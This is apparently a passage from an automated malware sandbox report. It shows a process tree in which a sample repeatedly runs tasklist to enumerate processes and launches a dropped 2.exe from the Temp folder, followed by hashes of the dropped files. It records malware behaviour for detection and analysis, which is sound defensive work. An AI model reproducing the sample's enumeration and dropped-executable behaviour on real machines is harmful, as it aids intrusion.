C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3376
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1452
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3104
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2820
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1844
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4680
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2832
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5100
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1596
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4760
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1548
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4744
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4880
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5004
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4936
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4548
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1984
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4800
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2168
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1588
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:372
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:488
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4996
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3432
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:5036
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1292
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3376
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1340
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1052
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4108
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3804
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4848
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3752
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1636
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4224
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3432
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1476
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3100
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exeC:\Users\Admin\AppData\Local\Temp\2.exe1⤵
- Executes dropped EXE
PID:3376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\2.exeC:\Users\Admin\AppData\Local\Temp\2.exe1⤵PID:3792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57c893ca48ff42340ddf826c03792324c
SHA1cfde28f4b315960e9ee7286b41d87123e9c6317d
SHA2567077ae935368823bb5544fdbb55e90b5170f4111e046a2444a056b420b863ac5
SHA5126dcd71969230fca53386ccbff2e1551bcb1935a262420eb5c385a4c11fa40fd168e0db69cb09afcf5470d4cf8505f0f464baefcdf2669564756c826ddde38d56
-
Filesize
15.5MB
MD53e8022886a32d7e8cfa543703bedbe69
SHA14d0dac8cf867ee9bad0ff3b013d09078b6d249a4
SHA2561529d279db6efacb681b29f59c332e0d5606ddeb635d385040672deead38f1de
SHA51201c58584051e53c0cd5760d26c87524bcb3c6eac1fb49c28db954a40d62d68273b492e455bfe037f5574be3ada2da7b1ad9465db501b97d1ed6c8c8ec1c524f9
-
Filesize
2.1MB
MD5883a6f06d8ead758563464e2f2c47dc1
SHA120bdc2670ab5fd20fe9f9533a24c6f61e18c50be
SHA2566e31997ecf4f4a800eb133d3d1f3216a88de2575cdf7ddf180899c2cdf585c18
SHA5122e9394f530f665a406eac5fc63cd6df33539c9cc244ac71c42d5874ea09de13b55395519ce363d34eb2d248ea0913612e21f609ffb82723f0c87306633542920
-
Filesize
2.1MB
MD5883a6f06d8ead758563464e2f2c47dc1
SHA120bdc2670ab5fd20fe9f9533a24c6f61e18c50be
SHA2566e31997ecf4f4a800eb133d3d1f3216a88de2575cdf7ddf180899c2cdf585c18
SHA5122e9394f530f665a406eac5fc63cd6df33539c9cc244ac71c42d5874ea09de13b55395519ce363d34eb2d248ea0913612e21f609ffb82723f0c87306633542920
-
Filesize
2.1MB
MD5883a6f06d8ead758563464e2f2c47dc1
SHA120bdc2670ab5fd20fe9f9533a24c6f61e18c50be
SHA2566e31997ecf4f4a800eb133d3d1f3216a88de2575cdf7ddf180899c2cdf585c18
SHA5122e9394f530f665a406eac5fc63cd6df33539c9cc244ac71c42d5874ea09de13b55395519ce363d34eb2d248ea0913612e21f609ffb82723f0c87306633542920
-
Filesize
2.1MB
MD5883a6f06d8ead758563464e2f2c47dc1
SHA120bdc2670ab5fd20fe9f9533a24c6f61e18c50be
SHA2566e31997ecf4f4a800eb133d3d1f3216a88de2575cdf7ddf180899c2cdf585c18
SHA5122e9394f530f665a406eac5fc63cd6df33539c9cc244ac71c42d5874ea09de13b55395519ce363d34eb2d248ea0913612e21f609ffb82723f0c87306633542920
-
Filesize
2.1MB
MD5883a6f06d8ead758563464e2f2c47dc1
SHA120bdc2670ab5fd20fe9f9533a24c6f61e18c50be
SHA2566e31997ecf4f4a800eb133d3d1f3216a88de2575cdf7ddf180899c2cdf585c18
SHA5122e9394f530f665a406eac5fc63cd6df33539c9cc244ac71c42d5874ea09de13b55395519ce363d34eb2d248ea0913612e21f609ffb82723f0c87306633542920
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.8MB
MD5e08b723ca187ecfef73c1b7b5f0ecfc8
SHA15f79ead45fbb019f4431cb978e830b99ba15c3a7
SHA25615c357922747ce8768f5567a74ea2ba8f6d1755b220d1007e89b913d940a86cc
SHA512b13a045e01faf1110b6cf10f632278b24716823013cd8e43fc9661196e5696317152f76f170f2b2f777faed9da8c998b05100af1b7fec92cd0f4913763471b3c
-
Filesize
7.8MB
MD5e08b723ca187ecfef73c1b7b5f0ecfc8
SHA15f79ead45fbb019f4431cb978e830b99ba15c3a7
SHA25615c357922747ce8768f5567a74ea2ba8f6d1755b220d1007e89b913d940a86cc
SHA512b13a045e01faf1110b6cf10f632278b24716823013cd8e43fc9661196e5696317152f76f170f2b2f777faed9da8c998b05100af1b7fec92cd0f4913763471b3c